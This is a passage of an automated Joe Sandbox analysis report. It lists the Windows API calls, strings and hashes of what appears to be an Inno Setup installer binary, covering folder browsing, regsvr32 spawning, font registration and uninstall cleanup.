                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FreeLibrary$MessageNotifySend
                                                                                                                                        • String ID: DeinitializeSetup$Deinitializing Setup.$GetCustomSetupExitCode$Not restarting Windows because Setup is being run from the debugger.$Restarting Windows.
                                                                                                                                        • API String ID: 3817813901-1884538726
                                                                                                                                        • Opcode ID: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                                                        • Instruction ID: b122ee3e0244d1cffd13458a0655c780be2d4a3cdc4850abd58d30bc7702deed
                                                                                                                                        • Opcode Fuzzy Hash: b2d1279a618dd00e76101f6ddb87be929459601488252b11527f6c6d16611b1a
                                                                                                                                        • Instruction Fuzzy Hash: C651BF347042409FD715EB69E9A5B6E7BE8EB19314F10887BE800C72B2DB389C46CB5D
                                                                                                                                        APIs
                                                                                                                                        • SHGetMalloc.SHELL32(?), ref: 004616C7
                                                                                                                                        • GetActiveWindow.USER32 ref: 0046172B
                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 0046173F
                                                                                                                                        • SHBrowseForFolder.SHELL32(?), ref: 00461756
                                                                                                                                        • CoUninitialize.OLE32(00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046176B
                                                                                                                                        • SetActiveWindow.USER32(?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 00461781
                                                                                                                                        • SetActiveWindow.USER32(?,?,00461797,00000000,?,?,?,?,?,00000000,0046181B), ref: 0046178A
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ActiveWindow$BrowseFolderInitializeMallocUninitialize
                                                                                                                                        • String ID: A
                                                                                                                                        • API String ID: 2684663990-3554254475
                                                                                                                                        • Opcode ID: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                                        • Instruction ID: 0f37cca2ee7d5c89cd5c8fe3b5c5f67eac08b275376d6c087401a1ac056189be
                                                                                                                                        • Opcode Fuzzy Hash: cb3d39f68a826354347aa7a8a61ff080deb010c50648a66159b3978de9eda5bc
                                                                                                                                        • Instruction Fuzzy Hash: C3312F70E00348AFDB10EFA6D885A9EBBF8EB09304F55847AF404E7251E7785A048F59
                                                                                                                                        APIs
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15,?,?,00000000,00472F84), ref: 00472A1C
                                                                                                                                          • Part of subcall function 0042CD94: GetPrivateProfileStringA.KERNEL32(00000000,00000000,00000000,00000000,00000100,00000000), ref: 0042CE0A
                                                                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                        • SetFileAttributesA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000,?,00472D15), ref: 00472A93
                                                                                                                                        • RemoveDirectoryA.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00472AB9,?,?,?,00000008,00000000,00000000,00000000), ref: 00472A99
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: File$Attributes$DeleteDirectoryPrivateProfileRemoveString
                                                                                                                                        • String ID: .ShellClassInfo$CLSID2$desktop.ini$target.lnk${0AFACED1-E828-11D1-9187-B532F1E9575D}
                                                                                                                                        • API String ID: 884541143-1710247218
                                                                                                                                        • Opcode ID: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                                                        • Instruction ID: 1765d5ebfc4e6887f49e3816ac39c9d5a3c16910e93b0aec031ce55b1572895b
                                                                                                                                        • Opcode Fuzzy Hash: c45dacd24f7b5bc8c90ad3d0814151273abff7c22a7deb77a2667df06dffab17
                                                                                                                                        • Instruction Fuzzy Hash: 6711B2707005147BD721EAAA8D82B9F73ACDB49714F61C17BB404B72C2DBBCAE01861C
                                                                                                                                        APIs
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateInit_), ref: 0045D2BD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflate), ref: 0045D2CD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateEnd), ref: 0045D2DD
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,inflateReset), ref: 0045D2ED
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: AddressProc
                                                                                                                                        • String ID: inflate$inflateEnd$inflateInit_$inflateReset
                                                                                                                                        • API String ID: 190572456-3516654456
                                                                                                                                        • Opcode ID: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                        • Instruction ID: d913f85fec6517a53d2ec7ba369195fd603025f4bffd93910817278a70f0814a
                                                                                                                                        • Opcode Fuzzy Hash: 5039b32c95ab4f878aa340bc95ef1656196d0563f790867e571847c0b893819f
                                                                                                                                        • Instruction Fuzzy Hash: C20112B0D00701DBE724DFF6ACC672636A5ABA8306F14C03B9D09962A2D77D0459DF2E
                                                                                                                                        APIs
                                                                                                                                        • SetBkColor.GDI32(?,00000000), ref: 0041A9B9
                                                                                                                                        • BitBlt.GDI32(?,00000000,00000000,?,?,?,00000000,00000000,00CC0020), ref: 0041A9F3
                                                                                                                                        • SetBkColor.GDI32(?,?), ref: 0041AA08
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00CC0020), ref: 0041AA52
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AA5D
                                                                                                                                        • SetBkColor.GDI32(00000000,00FFFFFF), ref: 0041AA6D
                                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,?,00000000,?,00000000,00000000,?,?,00E20746), ref: 0041AAAC
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0041AAB6
                                                                                                                                        • SetBkColor.GDI32(00000000,?), ref: 0041AAC3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Color$StretchText
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2984075790-0
                                                                                                                                        • Opcode ID: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                        • Instruction ID: 4467ea82dd13d464879b0bd0dd0607b47ee3045dce17e21d2c6451b7f26a8ea4
                                                                                                                                        • Opcode Fuzzy Hash: c2c61a06e11fc6ac6c72d0136d8e20986a2ab5507b690e8d84a304c9a27ba9fd
                                                                                                                                        • Instruction Fuzzy Hash: 8761E5B5A00505AFCB40EFADD985E9AB7F8EF08314B10816AF908DB262C775ED40CF58
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042D8C4: GetSystemDirectoryA.KERNEL32(?,00000104), ref: 0042D8D7
                                                                                                                                        • CloseHandle.KERNEL32(?,?,00000044,00000000,00000000,04000000,00000000,00000000,00000000,00458278,?, /s ",?,regsvr32.exe",?,00458278), ref: 004581EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseDirectoryHandleSystem
                                                                                                                                        • String ID: /s "$ /u$0x%x$CreateProcess$D$Spawning 32-bit RegSvr32: $Spawning 64-bit RegSvr32: $regsvr32.exe"
                                                                                                                                        • API String ID: 2051275411-1862435767
                                                                                                                                        • Opcode ID: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                        • Instruction ID: cda81b302c56d3c3b7af3d8ffa4af26d40175ae7a7c1cff7e24eee752c39b11a
                                                                                                                                        • Opcode Fuzzy Hash: 4002d2de1ab03b38d977d670fcb0d45de6735b09ab9cf6adf03ef289ce7e4165
                                                                                                                                        • Instruction Fuzzy Hash: 21411670A047486BDB10EFD6D842B8DBBF9AF45305F50407FB904BB292DF789A098B19
                                                                                                                                        APIs
                                                                                                                                        • OffsetRect.USER32(?,00000001,00000001), ref: 0044D1A9
                                                                                                                                        • GetSysColor.USER32(00000014), ref: 0044D1B0
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D1C8
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D1F1
                                                                                                                                        • OffsetRect.USER32(?,000000FF,000000FF), ref: 0044D1FB
                                                                                                                                        • GetSysColor.USER32(00000010), ref: 0044D202
                                                                                                                                        • SetTextColor.GDI32(00000000,00000000), ref: 0044D21A
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D243
                                                                                                                                        • DrawTextA.USER32(00000000,00000000,00000000), ref: 0044D26E
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Text$Color$Draw$OffsetRect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 1005981011-0
                                                                                                                                        • Opcode ID: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                        • Instruction ID: 8406a00effd73db105afccad7da3796984cf264811f0ddac3e5cace4e0ac1d2b
                                                                                                                                        • Opcode Fuzzy Hash: 32856f07fc45aa5b94f1f38070a47e962b22e9d58654105098b1be26c78061dc
                                                                                                                                        • Instruction Fuzzy Hash: A021BDB42015047FC710FB2ACD8AE8B6BDCDF19319B05457AB958EB292C67CDD404668
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041B745
                                                                                                                                        • GetDC.USER32(?), ref: 0041B751
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041B786
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041B792
                                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041B7C0
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041B7F4
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 3275473261-1959103961
                                                                                                                                        • Opcode ID: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                        • Instruction ID: 38bdddf8d72f5571b31e8017bfcff87152bbfcb95d4f6cd7f9962c0a723fddb9
                                                                                                                                        • Opcode Fuzzy Hash: 9b17a45ebd00e155e5aeae17ac6cac102e8e00fd56b9a0d3692e3d2bf0971335
                                                                                                                                        • Instruction Fuzzy Hash: 8A512F70A002099FDF11DFA9C881AEEBBF9FF49704F104066F504A7791D7799981CBA9
                                                                                                                                        APIs
                                                                                                                                        • GetFocus.USER32 ref: 0041BA17
                                                                                                                                        • GetDC.USER32(?), ref: 0041BA23
                                                                                                                                        • SelectPalette.GDI32(00000000,?,00000000), ref: 0041BA5D
                                                                                                                                        • RealizePalette.GDI32(00000000), ref: 0041BA69
                                                                                                                                        • CreateDIBitmap.GDI32(00000000,?,00000004,?,?,00000000), ref: 0041BA8D
                                                                                                                                        • SelectPalette.GDI32(00000000,00000000,00000000), ref: 0041BAC1
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Palette$Select$BitmapCreateFocusRealize
                                                                                                                                        • String ID: %H
                                                                                                                                        • API String ID: 3275473261-1959103961
                                                                                                                                        • Opcode ID: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                        • Instruction ID: 3fcaffe560058c7771eaec6053d79e0e1924f360d52694d27862de55114c0f48
                                                                                                                                        • Opcode Fuzzy Hash: f1b656a7ede54f8d65f93cc35dc493626dae048aef23b352968a277fb398f08e
                                                                                                                                        • Instruction Fuzzy Hash: 9D512A74A002189FDB11DFA9C891AAEBBF9FF49700F154066F904EB751D738AD40CBA4
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0045092C: SetEndOfFile.KERNEL32(?,?,0045C342,00000000,0045C4CD,?,00000000,00000002,00000002), ref: 00450933
                                                                                                                                          • Part of subcall function 00406F50: DeleteFileA.KERNEL32(00000000,0049B628,004986F1,00000000,00498746,?,?,00000005,?,00000000,00000000,00000000,Inno-Setup-RegSvr-Mutex,?,00000005,00000000), ref: 00406F5B
                                                                                                                                        • GetWindowThreadProcessId.USER32(00000000,?), ref: 00496585
                                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,00000000,?), ref: 00496599
                                                                                                                                        • SendNotifyMessageA.USER32(00000000,0000054D,00000000,00000000), ref: 004965B3
                                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965BF
                                                                                                                                        • CloseHandle.KERNEL32(00000000,00000000,000000FF,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965C5
                                                                                                                                        • Sleep.KERNEL32(000001F4,00000000,0000054D,00000000,00000000,00000000,?), ref: 004965D8
                                                                                                                                        Strings
                                                                                                                                        • Deleting Uninstall data files., xrefs: 004964FB
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileProcess$CloseDeleteHandleMessageNotifyObjectOpenSendSingleSleepThreadWaitWindow
                                                                                                                                        • String ID: Deleting Uninstall data files.
                                                                                                                                        • API String ID: 1570157960-2568741658
                                                                                                                                        • Opcode ID: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                        • Instruction ID: caddedc05ae4add9971b90b84c259ce0cd5246952d50e779d54ebc968ffbf915
                                                                                                                                        • Opcode Fuzzy Hash: 8e8cb50e53c2c3b2038bacabf8c777ac21aad5dfe2dc8a8db11d37eec289bdf4
                                                                                                                                        • Instruction Fuzzy Hash: 73216170204250BFEB10EB6ABC82B2637A8DB54728F53453BB501961D6DA7CAC448A6D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 0042DE1C: RegOpenKeyExA.ADVAPI32(80000002,System\CurrentControlSet\Control\Windows,;H,?,00000001,?,?,00483BE3,?,00000001,00000000), ref: 0042DE38
                                                                                                                                        • RegSetValueExA.ADVAPI32(?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9,?,?,?,?,00000000), ref: 00470263
                                                                                                                                        • RegCloseKey.ADVAPI32(?,?,00000000,00000000,00000001,00000000,00000001,?,00000002,00000000,00000000,004702F9), ref: 0047027A
                                                                                                                                        • AddFontResourceA.GDI32(00000000), ref: 00470297
                                                                                                                                        • SendNotifyMessageA.USER32(0000FFFF,0000001D,00000000,00000000), ref: 004702AB
                                                                                                                                        Strings
                                                                                                                                        • AddFontResource, xrefs: 004702B5
                                                                                                                                        • Failed to set value in Fonts registry key., xrefs: 0047026C
                                                                                                                                        • Failed to open Fonts registry key., xrefs: 00470281
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseFontMessageNotifyOpenResourceSendValue
                                                                                                                                        • String ID: AddFontResource$Failed to open Fonts registry key.$Failed to set value in Fonts registry key.
                                                                                                                                        • API String ID: 955540645-649663873
                                                                                                                                        • Opcode ID: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                        • Instruction ID: 122e39bb1ea2b43e4c2a7da55aa69ddad999e5e54c07bca5f4119535fc7344d3
                                                                                                                                        • Opcode Fuzzy Hash: f6cb4db48621d05014dac95341ab5faf08594db0be4636be460d29a68d9f0f75
                                                                                                                                        • Instruction Fuzzy Hash: 6921E271741204BBDB10EAA68C46FAE67AC9B14704F208477B904EB3C3DA7C9E01866D
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00416410: GetClassInfoA.USER32(00400000,?,?), ref: 0041647F
                                                                                                                                          • Part of subcall function 00416410: UnregisterClassA.USER32(?,00400000), ref: 004164AB
                                                                                                                                          • Part of subcall function 00416410: RegisterClassA.USER32(?), ref: 004164CE
                                                                                                                                        • GetVersion.KERNEL32 ref: 00462E60
                                                                                                                                        • SendMessageA.USER32(00000000,0000112C,00000004,00000004), ref: 00462E9E
                                                                                                                                        • SHGetFileInfo.SHELL32(00462F3C,00000000,?,00000160,00004011), ref: 00462EBB
                                                                                                                                        • LoadCursorA.USER32(00000000,00007F02), ref: 00462ED9
                                                                                                                                        • SetCursor.USER32(00000000,00000000,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462EDF
                                                                                                                                        • SetCursor.USER32(?,00462F1F,00007F02,00462F3C,00000000,?,00000160,00004011), ref: 00462F12
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ClassCursor$Info$FileLoadMessageRegisterSendUnregisterVersion
                                                                                                                                        • String ID: Explorer
                                                                                                                                        • API String ID: 2594429197-512347832
                                                                                                                                        • Opcode ID: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                        • Instruction ID: b0f6820fd5a5ea072646c086af9eca81c98a3cd1ffd9b7ca0f87214cf94a4ba1
                                                                                                                                        • Opcode Fuzzy Hash: 271d5cc6534746d744017855cbe3809792a4a5bc456b5a0a77df68c724b1ffee
                                                                                                                                        • Instruction Fuzzy Hash: CD21E7307403047AEB15BB759D47B9A3798DB09708F4004BFFA05EA1C3EEBD9901966D
                                                                                                                                        APIs
                                                                                                                                        • GetModuleHandleA.KERNEL32(kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 00478389
                                                                                                                                        • GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 0047838F
                                                                                                                                        • GetFileAttributesA.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783A2
                                                                                                                                        • CreateFileA.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleA,021D2BD4,?,?,?,021D2BD4), ref: 004783CC
                                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,021D2BD4,00478534,00000000,00478652,?,?,-00000010,?), ref: 004783EA
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000002.00000002.2500276568.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                        • Associated: 00000002.00000002.2500208187.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500666386.0000000000499000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500859380.000000000049A000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2500959781.000000000049B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        • Associated: 00000002.00000002.2501163724.00000000004AB000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_2_2_400000_list.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: FileHandle$AddressAttributesCloseCreateModuleProc
                                                                                                                                        • String ID: GetFinalPathNameByHandleA$kernel32.dll
                                                                                                                                        • API String ID: 2704155762-2318956294
                                                                                                                                        • Opcode ID: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
                                                                                                                                        • Instruction ID: 2a72e966618face2f1bd82d2a524167157479a72732682c44667b4342ad9b4bf
                                                                                                                                        • Opcode Fuzzy Hash: 606546fc07dcf4a3bd117f62e36919ba8c62e6b487fb6962041f4ee6dba1ecda
